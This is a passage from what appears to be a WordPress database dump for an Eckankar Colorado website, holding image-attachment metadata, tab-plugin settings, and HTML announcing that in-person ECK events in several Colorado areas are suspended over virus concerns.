6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442652929\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"32\";s:13:\"shutter_speed\";s:18:\"0.0068027210884354\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1086,7160,'_bgppb_default_editor','bgppb'),(55784,243467,'_wp_attached_file','2020/01/spex-sized.png'),(55785,243467,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:235;s:6:\"height\";i:147;s:4:\"file\";s:22:\"2020/01/spex-sized.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"spex-sized-150x147.png\";s:5:\"width\";i:150;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:20:\"spex-sized-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:22:\"spex-sized-210x147.png\";s:5:\"width\";i:210;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(55786,243467,'_wp_attachment_image_alt','Learn about the Spiritual Exercises of ECK'),(55787,243468,'_wp_attached_file','2020/01/eckco-meetups-sized.png'),(55788,243468,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:235;s:6:\"height\";i:147;s:4:\"file\";s:31:\"2020/01/eckco-meetups-sized.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"eckco-meetups-sized-150x147.png\";s:5:\"width\";i:150;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:29:\"eckco-meetups-sized-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:31:\"eckco-meetups-sized-210x147.png\";s:5:\"width\";i:210;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(55789,243468,'_wp_attachment_image_alt','Come to an ECK Meetup!'),(10846,125665,'_wp_attached_file','2019/08/ECK_Temple_CO_016-lg.jpg'),(10847,125665,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_016-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_016-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_016-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_016-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_016-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_016-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_016-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_016-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_016-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_016-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_016-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_016-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"iPhone 6 Plus\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1444235369\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"32\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1260,15203,'_rtbs_tabs_bg_color','#f0eded'),(1261,15203,'_rtbs_breakpoint','600'),(1262,15203,'_rtbs_original_font','no'),(1263,15203,'_rtbs_tbg','transparent'),(1264,15203,'boldgrid_hide_page_title','0'),(1265,15806,'_edit_last','2'),(1266,15806,'_edit_lock','1674583421:2'),(1267,15806,'wpsm_tabs_r_data','s:14772:\"a:6:{i:0;a:4:{s:10:\"tabs_title\";s:23:\"Central Colorado Events\";s:15:\"tabs_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:9:\"tabs_desc\";s:3048:\"<p><strong><span style=\"color: #23507d;\">CENTRAL COLORADO</span></strong><span style=\"color: #23507d;\"><strong><span style=\"font-size: 14pt;\"><img class=\"alignright size-full wp-image-260645\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/03/blue-flower.jpg\" alt=\"\" width=\"376\" height=\"212\" /></span></strong></span></p>\r\n<p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 14pt;\">ECK In-Person Events Suspended</span></strong></span></p>\r\n<p><span style=\"font-size: 13pt;\">Due to the ongoing world virus concerns, the ECK Temple of Colorado is suspending all in-person events and classes until further notice. Please join us for online events in the Central Colorado area.</span></p>\r\n<p class=\"\" style=\"margin-right: 0px; text-align: left;\"><a class=\"btn btn-rounded btn-color-1 btn-raised\" style=\"padding-right: 1em; padding-left: 1em; margin: 0px 15px 0px 0px; font-size: 15px;\" href=\"https://eckankar-colorado.org/central-colorado-public-calendar-mec/\">Central Colorado Calendar</a> <!-- EVENT #1 --><!--\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<p><strong><span style=\"color: #23507d;\">CENTRAL COLORADO<img class=\"alignright size-full wp-image-254622\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/the-sound-of-soul.png\" alt=\"HU -- The Sound of Soul\" width=\"366\" height=\"189\" /></span></strong></p>\r\n<p><strong><span style=\"color: #23507d;\"><span style=\"font-size: 13pt;\">Experience The Sound of Soul<br />\r\n</span></span></strong><strong>Date/Time: </strong>Sunday, March 15, 10:30 am – 11:30 am <br />\r\n<strong>Location: </strong>ECK Temple of Colorado<br />\r\n<span style=\"color: #666666;\">You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart. The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Experience some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"color: #666666;\">Inner peace and calm</span></li>\r\n	<li><span style=\"color: #666666;\">Divine love</span></li>\r\n	<li><span style=\"color: #666666;\">Expanded awareness</span></li>\r\n	<li><span style=\"color: #666666;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"color: #666666;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"color: #666666;\">Stay afterward for spiritual discussion, light refreshments and fellowship. For further information, call the ECK Temple of Colorado at 303-756-9287.</span><br />\r\n<a href=\"https://www.google.com/maps/place/7100+W+Mississippi+Ave,+Lakewood,+CO+80226/@39.6962662,-105.0758736,17z/data=!3m1!4b1!4m2!3m1!1s0x876b80e32b5b8d9b:0x3d736b1f2e624b96\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Driving Directions</strong></a></p>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n  --><!-- EVENT #2 --></p>\";}i:1;a:4:{s:10:\"tabs_title\";s:23:\"Colorado Springs Events\";s:15:\"tabs_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:9:\"tabs_desc\";s:2990:\"<p><strong><span style=\"color: #23507d;\">COLORADO SPRINGS</span></strong><img class=\"alignright size-full wp-image-256902\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/pink-flower-beach.jpg\" alt=\"\" width=\"366\" height=\"216\" /></p>\r\n<p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 14pt;\">ECK In-Person Events Suspended</span></strong></span></p>\r\n<p><span style=\"font-size: 13pt;\">Due to the ongoing world virus concerns, the Colorado Springs ECK Center is suspending all in-person events and classes until further notice. Please join us for online events in the Colorado Springs area.</span></p>\r\n<a class=\"btn btn-rounded btn-color-1 btn-raised\" style=\"padding-right: 1em; padding-left: 1em; margin-right: 15px; font-size: 15px;\" href=\"https://eckankar-colorado.org/colorado-springs-public-calendar-mec/\">Colorado Springs Calendar</a>\r\n<!--\r\n\r\n\r\n\r\n<p><strong><span style=\"color: #23507d;\">COLORADO SPRINGS</span></strong><img class=\"alignright size-full wp-image-251919\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/wisdom-of-the-heart-book-2.jpg\" alt=\"Wisdom of the Heart, Book 2\" width=\"145\" height=\"217\" /></p>\r\n<p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 13pt;\">Book Discussion<br />\r\n</span></strong></span><strong>Date/Time: </strong>Sunday, March 15, 10:30 am - 11:30 am<strong><br />\r\n<strong>Location: </strong></strong>Colorado Springs ECK Center<br />\r\n<span style=\"color: #666666;\">Ready to be a wiser, happier Soul? Turn your stumbling blocks into stepping-stones? Your dreams into gems of wisdom? Your goals into joyful, productive living?</span></p>\r\n<p><span style=\"color: #666666;\">This collection of Wisdom Notes is now offered to all interested seekers of God. It is filled with spiritual exercises and insights; it can breathe new life and wisdom into every corner of your world. Discover how you can: </span></p>\r\n<ul>\r\n	<li><span style=\"color: #666666;\">Understand the spiritual laws that shape events</span></li>\r\n	<li><span style=\"color: #666666;\">Learn how your dreams are more real than you think</span></li>\r\n	<li><span style=\"color: #666666;\">Find love in the secret name for God</span></li>\r\n</ul>\r\n<p><span style=\"color: #666666;\">More wisdom and love can be yours today. Step into life with your eyes wide open! And be ready to take a leap forward in your spiritual journey. </span><span style=\"color: #666666;\">Everyone is welcome! You can get the book <strong><a href=\"https://www.eckbooks.org/items/-98-3.html\" target=\"_blank\" rel=\"noopener\">online</a></strong> or purchase at your local ECK Center. For further information, call the Colorado Springs Eckankar Center at 719-633-0453.</span><br />\r\n<a href=\"https://www.google.com/maps/place/5245+Centennial+Blvd+%23100,+Colorado+Springs,+CO+80919/@38.9083951,-104.8626702,17z/data=!4m2!3m1!1s0x871351c932b555ff:0x8e93ed35d918ee3d?hl=en\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Driving Directions</strong></a></p>\r\n\r\n\r\n\r\n -->\";}i:2;a:4:{s:10:\"tabs_title\";s:15:\"Loveland Events\";s:15:\"tabs_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:9:\"tabs_desc\";s:2835:\"<p><strong><span style=\"color: #23507d;\">LOVELAND</span></strong><img class=\"alignright size-full wp-image-260661\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/03/tree-blue-field.jpg\" alt=\"\" width=\"338\" height=\"212\" /></p>\r\n<p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 14pt;\">ECK In-Person Events Suspended</span></strong></span></p>\r\n<p><span style=\"font-size: 13pt;\">Due to the ongoing world virus concerns, the Loveland ECK Center is suspending all in-person events and classes until further notice. Please join us for online events in the Loveland area.</span></p>\r\n<a class=\"btn btn-rounded btn-color-1 btn-raised\" style=\"padding-right: 2em; padding-left: 2em; margin-right: 15px; font-size: 15px;\" href=\"https://eckankar-colorado.org/loveland-public-calendar-mec/\"> Loveland Calendar</a>\r\n<!--\r\n\r\n\r\n\r\n\r\n<p><strong><span style=\"color: #23507d;\">LOVELAND<img class=\"alignright size-full wp-image-256899\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/blubutterfly-orange-flower.jpg\" alt=\"\" width=\"365\" height=\"217\" /></span></strong></p>\r\n<p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 13pt;\">ECK Light and Sound Service<br />\r\n</span></strong></span><strong>Date/Time: </strong>Sunday, March 15, 10:30 am – 11:30 am <br />\r\n<strong>Location:</strong> Loveland ECK Center<br />\r\n<span style=\"color: #666666;\">The ECK Light and Sound Service is a community event offered by Eckankar for spiritual seekers of all faiths and religious backgrounds. It is an uplifting event where you can reflect on and connect with the divine aspect within yourself. </span><span style=\"color: #666666;\">You will hear inspiring spiritual stories, experience the HU chant, and be able to speak with other like-hearted spiritual seekers. </span><span style=\"color: #666666;\">Attend an ECK Light & Sound Service to... </span></p>\r\n<ul>\r\n	<li><span style=\"color: #666666;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p><span style=\"color: #666666;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step. For further information, call the Loveland ECK Center at 970-663-5302.</span> <strong><br />\r\n<a href=\"http://maps.google.com/maps?f=d&hl=en&geocode=&saddr=&daddr=1135+North+Lincoln+Avenue,+Loveland,+CO+80537&sll=37.0625,-95.677068&sspn=48.374125,71.982422&ie=UTF8&z=16\" target=\"_blank\" rel=\"noopener noreferrer\">Driving Directions</a></strong></p>\r\n\r\n\r\n\r\n  -->\";}i:3;a:4:{s:10:\"tabs_title\";s:13:\"Pueblo Events\";s:15:\"tabs_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:9:\"tabs_desc\";s:2780:\"<p><strong><span style=\"color: #23507d;\">PUEBLO</span></strong><img class=\"alignright size-full wp-image-260656\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/03/red-poppy-field.jpg\" alt=\"\" width=\"376\" height=\"212\" /></p>\r\n<p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 14pt;\">ECK In-Person Events Suspended</span></strong></span></p>\r\n<p><span style=\"font-size: 13pt;\">Due to the ongoing world virus concerns, the Pueblo Sound of Soul Event is currently suspended until further notice. Please join us for online events in the Pueblo area.</span></p>\r\n<a class=\"btn btn-rounded btn-color-1 btn-raised\" style=\"padding-right: 1em; padding-left: 1em; margin-right: 15px; font-size: 15px;\"href=\"https://eckankar-colorado.org/colorado-springs-public-calendar-mec/\">Pueblo - Colorado Springs Calendar</a>\r\n<!-- \r\n\r\n\r\n\r\n\r\n<p><strong><span style=\"color: #23507d;\">PUEBLO</span></strong> <img class=\"alignright wp-image-254622 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/the-sound-of-soul.png\" alt=\"HU -- The Sound of Soul\" width=\"366\" height=\"189\" /></p>\r\n<p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 13pt;\">Experience The Sound of Soul</span> <br />\r\n</strong></span><strong>Date/Time: </strong>Friday, March 13, 7:00 pm – 7:30 pm <br />\r\n<strong>Location: </strong>Center for Inner Peace, 740 W. 15th Street, Pueblo, CO<br />\r\n<span style=\"color: #666666;\">You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart. The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Experience some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"color: #666666;\">Inner peace and calm</span></li>\r\n	<li><span style=\"color: #666666;\">Divine love</span></li>\r\n	<li><span style=\"color: #666666;\">Expanded awareness</span></li>\r\n	<li><span style=\"color: #666666;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"color: #666666;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"color: #666666;\">Stay afterward for spiritual discussion, light refreshments and fellowship.<br />\r\n<strong> <a href=\"https://www.google.com/maps/dir//740+West+15th+Street,+Pueblo,+CO+81003/@38.2805652,-104.6178421,19.46z/data=!4m8!4m7!1m0!1m5!1m1!1s0x8713a254051f6c79:0xb0b75cba1d5f202c!2m2!1d-104.6174346!2d38.2804526\" target=\"_blank\" rel=\"noopener noreferrer\">Driving Directions</a></strong></span></p>\r\n\r\n\r\n\r\n\r\n -->\";}i:4;a:4:{s:10:\"tabs_title\";s:14:\"Mountain Areas\";s:15:\"tabs_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:9:\"tabs_desc\";s:923:\"<p><strong><span style=\"color: #23507d;\">MOUNTAIN AREAS</span></strong><span style=\"color: #23507d;\"><strong><span style=\"font-size: 14pt;\"><img class=\"alignright size-full wp-image-260645\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/03/mtn-path-1.jpg\" alt=\"\" width=\"376\" height=\"212\" /></span></strong></span></p>\r\n<p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 14pt;\">ECK In-Person Events Suspended</span></strong></span></p>\r\n<p><span style=\"font-size: 13pt;\">Due to the ongoing world virus concerns, the Colorado Mountain Areas are suspending all in-person events and classes until further notice. Please join us for online events in the Mountain Areas.</span></p>\r\n<p><a class=\"btn btn-rounded btn-color-1 btn-raised\" style=\"padding-right: 1em; padding-left: 1em; font-size: 15px;\" href=\"https://eckankar-colorado.org/mountain-area-public-calendar-mec/\">Mountain Areas Calendar</a></p>\";}i:5;a:4:{s:10:\"tabs_title\";s:34:\"Experience HU —The Sound of Soul\";s:15:\"tabs_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:9:\"tabs_desc\";s:1247:\"<p><span style=\"color: #23507d;\"><strong>HU SONG<a href=\"http://youtu.be/zvecTKM_-wk\" target=\"_blank\" rel=\"noopener noreferrer\"><img class=\"alignnone\" style=\"padding-left: 15px; max-width: 100%; float: right;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/05/miracles_video-lg.jpg\" alt=\"Experience HU -- The Sound of Soul\" width=\"397\" height=\"212\" /></a></strong></span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong><span style=\"color: #23507d;\">Experience HU —The Sound of Soul</span></strong> </span></p>\r\n<p><span style=\"font-size: 13pt;\">Join us in singing <strong>HU</strong>, a sacred sound that can help you meet life’s challenges. This ancient and once secret name for God has helped people from all backgrounds throughout the ages. Open to the public.</span></p>\r\n<p><span style=\"color: #666666; font-size: 12pt;\"> \"When you sing HU, the Holy Spirit begins to work in your life. It begins to change the situation with which you are struggling.\"<br />\r\n<em>— </em>Harold Klemp<em>, The Drumbeat of Time, </em>page 119</span></p>\r\n<p><span style=\"font-size: 12pt;\">Check <a href=\"https://eckankar-colorado.org/hu-colorado/\" target=\"_blank\" rel=\"noopener\">HU Colorado</a> for a \"Sound of Soul\" event near you!</span></p>\";}}\";'),(93515,261707,'_field_224','Sue'),(93516,261707,'_field_225','Smith'),(93517,261707,'_field_226','utah.eckpres@gmail.com'),(93518,261707,'_field_227','UT'),(93519,261707,'_field_228','US'),(93520,261707,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(93521,261707,'_form_id','21'),(93522,261707,'_seq_num','101'),(73573,254555,'_wp_attached_file','2020/01/a-modern-prophet-answers-your-questions-book-2.jpg'),(73574,254555,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:217;s:4:\"file\";s:58:\"2020/01/a-modern-prophet-answers-your-questions-book-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"a-modern-prophet-answers-your-questions-book-2-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:56:\"a-modern-prophet-answers-your-questions-book-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:58:\"a-modern-prophet-answers-your-questions-book-2-120x180.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:58:\"a-modern-prophet-answers-your-questions-book-2-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(72837,91821,'protect_children',''),(1268,15806,'wpsm_tabs_r_count','6'),(1269,15806,'Tabs_R_Settings','s:783:\"a:22:{s:14:\"tabs_sec_title\";s:2:\"no\";s:20:\"show_tabs_title_icon\";s:1:\"2\";s:20:\"show_tabs_icon_align\";s:4:\"left\";s:18:\"enable_tabs_border\";s:3:\"yes\";s:14:\"tabs_alignment\";s:10:\"horizontal\";s:13:\"tabs_position\";s:4:\"left\";s:11:\"tabs_margin\";s:3:\"yes\";s:19:\"tabs_content_margin\";s:2:\"no\";s:11:\"tabs_styles\";s:1:\"1\";s:17:\"tabs_title_bg_clr\";s:7:\"#f4f4f4\";s:19:\"tabs_title_icon_clr\";s:7:\"#333333\";s:24:\"select_tabs_title_bg_clr\";s:7:\"#23507d\";s:26:\"select_tabs_title_icon_clr\";s:7:\"#ffffff\";s:16:\"tabs_desc_bg_clr\";s:7:\"#ffffff\";s:18:\"tabs_desc_font_clr\";s:7:\"#333333\";s:10:\"title_size\";s:2:\"14\";s:8:\"des_size\";s:2:\"14\";s:11:\"font_family\";s:9:\"Open Sans\";s:14:\"tabs_animation\";s:6:\"fadeIn\";s:10:\"custom_css\";s:0:\"\";s:19:\"tabs_display_on_mob\";s:1:\"3\";s:21:\"tabs_display_mode_mob\";s:1:\"2\";}\";'),(1270,15806,'boldgrid_hide_page_title','0'),(10834,125659,'_wp_attached_file','2019/08/ECK_Temple_CO_009-lg.jpg'),(10835,125659,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_009-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_009-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_009-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_009-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_009-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_009-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_009-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_009-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_009-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_009-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_009-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_009-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442601573\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10850,125667,'_wp_attached_file','2019/08/ECK_Temple_CO_018-lg.jpg'),(10851,125667,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_018-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_018-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_018-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_018-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_018-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_018-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_018-